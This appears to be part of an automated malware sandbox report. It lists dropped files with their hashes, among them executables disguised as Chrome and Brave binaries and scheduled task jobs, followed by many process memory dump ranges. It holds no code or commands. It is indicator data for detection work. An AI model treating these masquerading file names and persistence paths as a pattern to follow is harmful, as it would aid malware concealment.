                                                        • C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe

                                                          Filesize

                                                          9KB

                                                          MD5

                                                          a169fb1a323c970f7a169b30657112cc

                                                          SHA1

                                                          5347dc5c0fe604f8527e336dd09a522fef0af9db

                                                          SHA256

                                                          97ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04

                                                          SHA512

                                                          8bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463

                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                          Filesize

                                                          7KB

                                                          MD5

                                                          efc6a5a24a78204996857f44cd1c07ab

                                                          SHA1

                                                          30c86a082e1dfc99f1fc4acac3bfaeab1b1f1b14

                                                          SHA256

                                                          756667573300b9f56e6561eda69527fe17859df8055a24692c237bb2f1d3f453

                                                          SHA512

                                                          64ebffbd93f3abe26bc4185020b868fb377af30ec060357003d2fd387ee2c9d7031fe7e1715b95a5f87bd9497772c5bc2092bdf47cd7b8f323cd94b647f477e6

                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                          Filesize

                                                          7KB

                                                          MD5

                                                          efc6a5a24a78204996857f44cd1c07ab

                                                          SHA1

                                                          30c86a082e1dfc99f1fc4acac3bfaeab1b1f1b14

                                                          SHA256

                                                          756667573300b9f56e6561eda69527fe17859df8055a24692c237bb2f1d3f453

                                                          SHA512

                                                          64ebffbd93f3abe26bc4185020b868fb377af30ec060357003d2fd387ee2c9d7031fe7e1715b95a5f87bd9497772c5bc2092bdf47cd7b8f323cd94b647f477e6

                                                        • C:\Windows\Tasks\dialersvc32.job

                                                          Filesize

                                                          1KB

                                                          MD5

                                                          9ae65d4ee4b5f3e0c760f1df9fa3d739

                                                          SHA1

                                                          5d1101edc079387e584e4073a0e6e4d509e9a627

                                                          SHA256

                                                          ad25b1ae5ffc543859458f99a0bb0df41669366b165cf84ec71da77c387850b5

                                                          SHA512

                                                          983ee5d7739b25deec1e4a38df20702e102181d7eb5269c49f9f043f0f36198483c6fc86ed7535028ebadf27d44985a0ff681cb3fccab793264fddae073ffeb2

                                                        • C:\Windows\Tasks\dialersvc64.job

                                                          Filesize

                                                          1KB

                                                          MD5

                                                          65899e54e0c1b08790d3d6d0fbca0f76

                                                          SHA1

                                                          acd5683c20f24fe61c2e2152af5119742c6a3337

                                                          SHA256

                                                          aec13e98a87965016c3c7cbb37ddc5cb4c989d909028f78f62a821fd06fb5d86

                                                          SHA512

                                                          31c3504411928f8fdb27758e28d7340837c57e51cf52611a7c48578735b149a0e726ecf861129307823762468ff7fafe8b0c7011e2d14aa6fe1095cb908e9329

                                                        • \Program Files\Google\Chrome\updater.exe

                                                          Filesize

                                                          2.8MB

                                                          MD5

                                                          eb27bb8cfa99d659e4fe023e9002ecd1

                                                          SHA1

                                                          c783400302fdfae0518269c5a5a8d4bad29f42a3

                                                          SHA256

                                                          9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

                                                          SHA512

                                                          ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

                                                        • \Users\Admin\AppData\Local\Microsoft\brave.exe

                                                          Filesize

                                                          2.8MB

                                                          MD5

                                                          9253ed091d81e076a3037e12af3dc871

                                                          SHA1

                                                          ec02829a25b3bf57ad061bbe54180d0c99c76981

                                                          SHA256

                                                          78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859

                                                          SHA512

                                                          29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4

                                                        • \Users\Admin\AppData\Local\Microsoft\chrome.exe

                                                          Filesize

                                                          6.8MB

                                                          MD5

                                                          73b9004ff373f3b7b2f595541deb5a02

                                                          SHA1

                                                          bbc01bab5ae8ed8db2359c3b8a81eed75db5c061

                                                          SHA256

                                                          b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7

                                                          SHA512

                                                          908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4

                                                        • \Users\Admin\AppData\Local\Microsoft\chrome.exe

                                                          Filesize

                                                          6.8MB

                                                          MD5

                                                          73b9004ff373f3b7b2f595541deb5a02

                                                          SHA1

                                                          bbc01bab5ae8ed8db2359c3b8a81eed75db5c061

                                                          SHA256

                                                          b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7

                                                          SHA512

                                                          908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4

                                                        • \Users\Admin\AppData\Local\Microsoft\chrome.exe

                                                          Filesize

                                                          6.8MB

                                                          MD5

                                                          73b9004ff373f3b7b2f595541deb5a02

                                                          SHA1

                                                          bbc01bab5ae8ed8db2359c3b8a81eed75db5c061

                                                          SHA256

                                                          b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7

                                                          SHA512

                                                          908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4

                                                        • \Users\Admin\AppData\Local\Microsoft\chrome.exe

                                                          Filesize

                                                          6.8MB

                                                          MD5

                                                          73b9004ff373f3b7b2f595541deb5a02

                                                          SHA1

                                                          bbc01bab5ae8ed8db2359c3b8a81eed75db5c061

                                                          SHA256

                                                          b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7

                                                          SHA512

                                                          908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4

                                                        • \Users\Admin\AppData\Local\Microsoft\chrome.exe

                                                          Filesize

                                                          6.8MB

                                                          MD5

                                                          73b9004ff373f3b7b2f595541deb5a02

                                                          SHA1

                                                          bbc01bab5ae8ed8db2359c3b8a81eed75db5c061

                                                          SHA256

                                                          b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7

                                                          SHA512

                                                          908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4

                                                        • \Users\Admin\AppData\Local\Microsoft\chrome.exe

                                                          Filesize

                                                          6.8MB

                                                          MD5

                                                          73b9004ff373f3b7b2f595541deb5a02

                                                          SHA1

                                                          bbc01bab5ae8ed8db2359c3b8a81eed75db5c061

                                                          SHA256

                                                          b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7

                                                          SHA512

                                                          908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4

                                                        • \Users\Admin\AppData\Local\Microsoft\ofg.exe

                                                          Filesize

                                                          9KB

                                                          MD5

                                                          a169fb1a323c970f7a169b30657112cc

                                                          SHA1

                                                          5347dc5c0fe604f8527e336dd09a522fef0af9db

                                                          SHA256

                                                          97ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04

                                                          SHA512

                                                          8bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463

                                                        • \Users\Admin\AppData\Local\Microsoft\ofg.exe

                                                          Filesize

                                                          9KB

                                                          MD5

                                                          a169fb1a323c970f7a169b30657112cc

                                                          SHA1

                                                          5347dc5c0fe604f8527e336dd09a522fef0af9db

                                                          SHA256

                                                          97ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04

                                                          SHA512

                                                          8bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463

                                                        • memory/336-283-0x0000000000990000-0x00000000009BA000-memory.dmp

                                                          Filesize

                                                          168KB

                                                        • memory/336-266-0x0000000036D70000-0x0000000036D80000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/336-265-0x0000000000990000-0x00000000009BA000-memory.dmp

                                                          Filesize

                                                          168KB

                                                        • memory/416-210-0x0000000000870000-0x000000000089A000-memory.dmp

                                                          Filesize

                                                          168KB

                                                        • memory/416-179-0x0000000000840000-0x0000000000863000-memory.dmp

                                                          Filesize

                                                          140KB

                                                        • memory/416-183-0x000007FEBEEA0000-0x000007FEBEEB0000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/416-184-0x0000000036D70000-0x0000000036D80000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/416-206-0x0000000000840000-0x0000000000863000-memory.dmp

                                                          Filesize

                                                          140KB

                                                        • memory/460-223-0x00000000001D0000-0x00000000001FA000-memory.dmp

                                                          Filesize

                                                          168KB

                                                        • memory/460-189-0x000007FEBEEA0000-0x000007FEBEEB0000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/460-191-0x0000000036D70000-0x0000000036D80000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/476-194-0x000007FEBEEA0000-0x000007FEBEEB0000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/476-197-0x0000000036D70000-0x0000000036D80000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/476-224-0x0000000000210000-0x000000000023A000-memory.dmp

                                                          Filesize

                                                          168KB

                                                        • memory/480-275-0x0000000001B90000-0x0000000001BBA000-memory.dmp

                                                          Filesize

                                                          168KB

                                                        • memory/480-269-0x0000000036D70000-0x0000000036D80000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/484-205-0x000007FEBEEA0000-0x000007FEBEEB0000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/484-228-0x0000000000350000-0x000000000037A000-memory.dmp

                                                          Filesize

                                                          168KB

                                                        • memory/484-208-0x0000000036D70000-0x0000000036D80000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/596-230-0x0000000000180000-0x00000000001AA000-memory.dmp

                                                          Filesize

                                                          168KB

                                                        • memory/596-231-0x0000000036D70000-0x0000000036D80000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/672-242-0x0000000036D70000-0x0000000036D80000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/672-239-0x00000000005B0000-0x00000000005DA000-memory.dmp

                                                          Filesize

                                                          168KB

                                                        • memory/672-282-0x00000000005B0000-0x00000000005DA000-memory.dmp

                                                          Filesize

                                                          168KB

                                                        • memory/756-244-0x0000000000940000-0x000000000096A000-memory.dmp

                                                          Filesize

                                                          168KB

                                                        • memory/756-246-0x0000000036D70000-0x0000000036D80000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/804-251-0x0000000000580000-0x00000000005AA000-memory.dmp

                                                          Filesize

                                                          168KB

                                                        • memory/804-252-0x0000000036D70000-0x0000000036D80000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/840-143-0x00000000024BB000-0x00000000024DA000-memory.dmp

                                                          Filesize

                                                          124KB

                                                        • memory/840-136-0x000007FEF3250000-0x000007FEF3C73000-memory.dmp

                                                          Filesize

                                                          10.1MB

                                                        • memory/840-142-0x00000000024BB000-0x00000000024DA000-memory.dmp

                                                          Filesize

                                                          124KB

                                                        • memory/840-141-0x00000000024B4000-0x00000000024B7000-memory.dmp

                                                          Filesize

                                                          12KB

                                                        • memory/840-139-0x000000001B7E0000-0x000000001BADF000-memory.dmp

                                                          Filesize

                                                          3.0MB

                                                        • memory/840-137-0x000007FEF2010000-0x000007FEF2B6D000-memory.dmp

                                                          Filesize

                                                          11.4MB

                                                        • memory/852-273-0x0000000036D70000-0x0000000036D80000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/852-257-0x0000000000A00000-0x0000000000A2A000-memory.dmp

                                                          Filesize

                                                          168KB

                                                        • memory/876-274-0x0000000036D70000-0x0000000036D80000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/876-262-0x0000000000880000-0x00000000008AA000-memory.dmp

                                                          Filesize

                                                          168KB

                                                        • memory/960-115-0x000007FEF3BF0000-0x000007FEF4613000-memory.dmp

                                                          Filesize

                                                          10.1MB

                                                        • memory/960-118-0x000007FEF3090000-0x000007FEF3BED000-memory.dmp

                                                          Filesize

                                                          11.4MB

                                                        • memory/960-129-0x000000000275B000-0x000000000277A000-memory.dmp

                                                          Filesize

                                                          124KB

                                                        • memory/960-125-0x0000000002754000-0x0000000002757000-memory.dmp

                                                          Filesize

                                                          12KB

                                                        • memory/960-128-0x0000000002754000-0x0000000002757000-memory.dmp

                                                          Filesize

                                                          12KB

                                                        • memory/2064-156-0x00000000735F0000-0x0000000073B9B000-memory.dmp

                                                          Filesize

                                                          5.7MB

                                                        • memory/2064-196-0x0000000076F10000-0x0000000077090000-memory.dmp

                                                          Filesize

                                                          1.5MB

                                                        • memory/2064-172-0x00000000735F0000-0x0000000073B9B000-memory.dmp

                                                          Filesize

                                                          5.7MB

                                                        • memory/2088-152-0x000007FEF3BF0000-0x000007FEF4613000-memory.dmp

                                                          Filesize

                                                          10.1MB

                                                        • memory/2088-153-0x000007FEF3090000-0x000007FEF3BED000-memory.dmp

                                                          Filesize

                                                          11.4MB

                                                        • memory/2088-155-0x0000000001154000-0x0000000001157000-memory.dmp

                                                          Filesize

                                                          12KB

                                                        • memory/2088-157-0x0000000076D30000-0x0000000076ED9000-memory.dmp

                                                          Filesize

                                                          1.7MB

                                                        • memory/2088-160-0x0000000076D30000-0x0000000076ED9000-memory.dmp

                                                          Filesize

                                                          1.7MB

                                                        • memory/2088-175-0x0000000001154000-0x0000000001157000-memory.dmp

                                                          Filesize

                                                          12KB

                                                        • memory/2088-159-0x000000000115B000-0x000000000117A000-memory.dmp

                                                          Filesize

                                                          124KB

                                                        • memory/2088-158-0x0000000076B10000-0x0000000076C2F000-memory.dmp

                                                          Filesize

                                                          1.1MB

                                                        • memory/2088-180-0x0000000076D30000-0x0000000076ED9000-memory.dmp

                                                          Filesize

                                                          1.7MB

                                                        • memory/2088-177-0x000000000115B000-0x000000000117A000-memory.dmp

                                                          Filesize

                                                          124KB

                                                        • memory/2088-182-0x0000000076B10000-0x0000000076C2F000-memory.dmp

                                                          Filesize

                                                          1.1MB

                                                        • memory/2244-167-0x0000000000400000-0x0000000000435000-memory.dmp

                                                          Filesize

                                                          212KB

                                                        • memory/2244-216-0x0000000076F10000-0x0000000077090000-memory.dmp

                                                          Filesize

                                                          1.5MB

                                                        • memory/2244-284-0x0000000076F10000-0x0000000077090000-memory.dmp

                                                          Filesize

                                                          1.5MB

                                                        • memory/2244-162-0x0000000000400000-0x0000000000435000-memory.dmp

                                                          Filesize

                                                          212KB

                                                        • memory/2244-213-0x0000000000400000-0x0000000000435000-memory.dmp

                                                          Filesize

                                                          212KB

                                                        • memory/2244-235-0x0000000000070000-0x000000000008B000-memory.dmp

                                                          Filesize

                                                          108KB

                                                        • memory/2244-237-0x0000000000090000-0x00000000000B1000-memory.dmp

                                                          Filesize

                                                          132KB

                                                        • memory/2268-176-0x0000000076D30000-0x0000000076ED9000-memory.dmp

                                                          Filesize

                                                          1.7MB

                                                        • memory/2268-173-0x0000000140000000-0x0000000140042000-memory.dmp

                                                          Filesize

                                                          264KB

                                                        • memory/2268-202-0x0000000076D30000-0x0000000076ED9000-memory.dmp

                                                          Filesize

                                                          1.7MB

                                                        • memory/2268-166-0x0000000140000000-0x0000000140042000-memory.dmp

                                                          Filesize

                                                          264KB

                                                        • memory/2268-198-0x0000000140000000-0x0000000140042000-memory.dmp

                                                          Filesize

                                                          264KB

                                                        • memory/2268-178-0x0000000076B10000-0x0000000076C2F000-memory.dmp

                                                          Filesize

                                                          1.1MB

                                                        • memory/2632-272-0x0000000000D10000-0x0000000000D18000-memory.dmp

                                                          Filesize

                                                          32KB

                                                        • memory/2956-281-0x000000000113B000-0x000000000115A000-memory.dmp

                                                          Filesize

                                                          124KB

                                                        • memory/2956-286-0x0000000001134000-0x0000000001137000-memory.dmp

                                                          Filesize

                                                          12KB

                                                        • memory/2956-280-0x0000000001134000-0x0000000001137000-memory.dmp

                                                          Filesize

                                                          12KB

                                                        • memory/146836-77-0x0000000006D00000-0x000000000759E000-memory.dmp

                                                          Filesize

                                                          8.6MB

                                                        • memory/146836-62-0x0000000000400000-0x0000000000420000-memory.dmp

                                                          Filesize

                                                          128KB

                                                        • memory/146836-56-0x0000000000400000-0x0000000000420000-memory.dmp

                                                          Filesize

                                                          128KB

                                                        • memory/146836-54-0x0000000000400000-0x0000000000420000-memory.dmp

                                                          Filesize

                                                          128KB

                                                        • memory/146836-64-0x0000000075C61000-0x0000000075C63000-memory.dmp

                                                          Filesize

                                                          8KB

                                                        • memory/146836-63-0x0000000000400000-0x0000000000420000-memory.dmp

                                                          Filesize

                                                          128KB

                                                        • memory/146856-102-0x000000000236B000-0x000000000238A000-memory.dmp

                                                          Filesize

                                                          124KB

                                                        • memory/146856-98-0x000007FEF3250000-0x000007FEF3C73000-memory.dmp

                                                          Filesize

                                                          10.1MB

                                                        • memory/146856-101-0x000000001B720000-0x000000001BA1F000-memory.dmp

                                                          Filesize

                                                          3.0MB

                                                        • memory/146856-100-0x0000000002364000-0x0000000002367000-memory.dmp

                                                          Filesize

                                                          12KB

                                                        • memory/146856-99-0x000007FEF2010000-0x000007FEF2B6D000-memory.dmp

                                                          Filesize

                                                          11.4MB

                                                        • memory/146856-103-0x0000000002364000-0x0000000002367000-memory.dmp

                                                          Filesize

                                                          12KB

                                                        • memory/146856-104-0x000000000236B000-0x000000000238A000-memory.dmp

                                                          Filesize

                                                          124KB

                                                        • memory/146856-97-0x000007FEFB5B1000-0x000007FEFB5B3000-memory.dmp

                                                          Filesize

                                                          8KB

                                                        • memory/147148-285-0x0000000000110000-0x000000000013E000-memory.dmp

                                                          Filesize

                                                          184KB

                                                        • memory/147148-80-0x00000000002C0000-0x0000000000B5E000-memory.dmp

                                                          Filesize

                                                          8.6MB

                                                        • memory/147148-222-0x0000000000180000-0x00000000001A1000-memory.dmp

                                                          Filesize

                                                          132KB

                                                        • memory/147148-221-0x0000000000110000-0x000000000013E000-memory.dmp

                                                          Filesize

                                                          184KB

                                                        • memory/147148-190-0x000000006EF10000-0x000000006EF20000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/147148-144-0x00000000002C0000-0x0000000000B5E000-memory.dmp

                                                          Filesize

                                                          8.6MB

                                                        • memory/147172-83-0x0000000000A60000-0x0000000000A68000-memory.dmp

                                                          Filesize

                                                          32KB

                                                        • memory/147224-95-0x0000000073600000-0x0000000073BAB000-memory.dmp

                                                          Filesize

                                                          5.7MB

                                                        • memory/147224-93-0x0000000073600000-0x0000000073BAB000-memory.dmp

                                                          Filesize

                                                          5.7MB

                                                        • memory/147376-186-0x0000000000540000-0x000000000055B000-memory.dmp

                                                          Filesize

                                                          108KB

                                                        • memory/147376-201-0x000000006EF10000-0x000000006EF20000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/147376-226-0x0000000000560000-0x0000000000581000-memory.dmp

                                                          Filesize

                                                          132KB